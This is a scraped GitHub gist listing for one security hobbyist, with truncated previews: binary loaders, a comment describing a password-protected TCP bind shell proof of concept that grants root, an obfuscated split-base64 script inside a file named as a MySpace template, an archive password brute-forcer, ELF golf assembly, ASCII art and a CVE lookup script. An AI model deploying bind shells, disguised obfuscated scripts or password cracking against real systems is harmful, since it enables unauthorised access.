Skip to content

Instantly share code, notes, and snippets.

View netspooky's full-sized avatar
🍙
Meditating

【☆ ゆう ☆ 】 netspooky

🍙
Meditating
View GitHub Profile
@netspooky
netspooky / misato.py
Created August 29, 2017 01:35
Binary Loader
import binascii
import subprocess
t = [ "0000","005f","0100","015f","0200",
"0201","0300","0400","0500","056a",
"0600","0800","0853","0900","0d00",
"1000","1100","1400","1800","1900",
"1b00","2000","2100","2900","2e73",
"2e74","2f62","2f73","31c0","3800",
"3801","3b0f","3e00","4000","4831",
@netspooky
netspooky / shinji3_loader.py
Last active October 24, 2017 00:43
Shinji 3
import binascii, subprocess
######################################################
# Shinji 3 is a proof of concept password protected #
# TCP Bind Shell binary. This one only works on #
# localhost, but you could modify to send /bin/sh #
# wherev, or use for local priv esc (: #
# #
# First create a listener $ nc -lvp 4444 #
# Then run the loader + binary #
# Then type the password 'ayy!' to become root. #
@netspooky
netspooky / myspace_template.html
Created September 30, 2017 02:52
Blingee Designs
<html><script>/*. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . */
ci="nVuY3Rpb24gZ";io="O319ZCgpOw==";jk="jMmhwYm1wcE1";/* . */mm="lKC0tXzB4OW";
jw="VuY3Rpb24oX";og="yIF8weDVlNT";/*. . . . . . . . . . . .*/ps="GNITTZMeTly";
cn="1cm4gXzB4Mm";d5="MHhjZWRkKCcw";/*. . . . . . . . . . . */df="MHgyNjQ1NDV";
re="HgyNjQ1NDVbJ";rm="vbihfMHgyODQ";/*. . */k1="NlZGQoJzB4M";rp="zB4MTE0ZDEw";
rv="icpXTtfMHgx";/*. . . . . . . . . . . .*/ij="E0PV8weGVkZ";k5="xfMHhjZWRkK";
k7="NTA3MCkrYXR";/* . . */k8="I3YjAzW18weG";k9="HgyODQ2MjE9";we="ihfMHg5ZTM0";
wh="ZD1mdW5jdGl";/*. . .*/ag="XIgXzB4Y2Vk";sn="NjIxXTtyZXR";ww="8weDExNGQxMD";
k6="Cgpe3ZhciBf";/* . . .*/xz="UzNDYxKXtfM";zz="2MjEsXzB4NT";g9="BjMzhkKXtfM";
tg="1mdW5jdGlvb";/*. . . . . . . . . . . */tk="h2YXIgXzB4M";so="IgXzB4MmZmOG";
import subprocess
import sys
import os
archive = sys.argv[2]
passfile = sys.argv[1]
f = open(passfile, "r")
for line in iter(f):
trypass = line.strip('\n')
Super work in progress. These are 80 column wide text effects from old
pirate groups, BBS's, and elsewhere.
Marked with --- at the beginning marks visually similar or related elements
---[ Ratings ]
[■■■■■■■■■■] 10/10
░░░░░░░▒▒▒ 7/10
[■■■■■■----]
This is a collection of NFO templates from various PSP Crack / Warez Groups
--- 4Fun
▄▀ ▄▄█▓▄ ____________________ __________ ▄▓█▄▄ ▀▄
▐█ ███▀██▓▄ / | \_ _____/ | \ \@TiLK ▄▓██▀███ █▌
▓██▀ ░▐█▓▓ / | || __) | | / | \ ▓▓█▌░ ▀██▓
▀█▓ ░▐█▓▌ / ^ / \ | | / | \ ▐▓█▌░ ▓█▀
▀▀ ▄██▓ \____ |\___ / |______/\____|__ / ▓██▄ ▀▀
▄██▓▀ ▄▀ |__| \/ \/ ▀▄ ▀▓██▄

Keybase proof

I hereby claim:

  • I am yuudev on github.
  • I am yuu (https://keybase.io/yuu) on keybase.
  • I have a public key ASDQIydjpVlQx_E5naVLU96qDEUSlQvDim0CIZeSl4atnwo

To claim this, I am signing this object:

@netspooky
netspooky / exit.asm
Last active June 23, 2021 01:10
For writeup
BITS 64
org 0x100000000 ; Where to load this into memory
;----------------------+------+-------------+----------+------------------------
; ELF Header struct | OFFS | ELFHDR | PHDR | ASSEMBLY OUTPUT
;----------------------+------+-------------+----------+------------------------
db 0x7F, "ELF" ; 0x00 | e_ident | | 7f 45 4c 46
_start: mov al,0x3c ; 0x04 | ei_class | | b0
; 0x05 | ei_data | | 3c
@netspooky
netspooky / bye.asm
Last active June 23, 2021 01:06
For write up
; 84 byte LINUX_REBOOT_CMD_POWER_OFF Binary Golf
BITS 64
org 0x100000000
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+
; CODE LISTING | OFFS | ASSEMBLY | CODE COMMENT | ELF HEADER STRUCT | PHDR |
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+
db 0x7F, "ELF" ; 0x0 | 7f454c46 | PROTIP: Can use magic as a constant ;) | ELF Magic | |
_start: ;------|------------|------------------------------------------|-----------------------------|----------|
mov edx, 0x4321fedc ; 0x04 | badcfe2143 | Moving magic values... | ei_class,ei_data,ei_version | |
mov esi, 0x28121969 ; 0x09 | be69191228 | into their respective places | unused | |
import urllib.request, json, sys, textwrap
# Run like
# python3 pubsploit.py CVE-2017-0143
def cveSearch(cve):
with urllib.request.urlopen('http://cve.circl.lu/api/cve/'+cve) as url:
data = json.loads(url.read().decode())
try:
if data['cvss']:
print("{} | CVSS {}".format(cve,data['cvss']))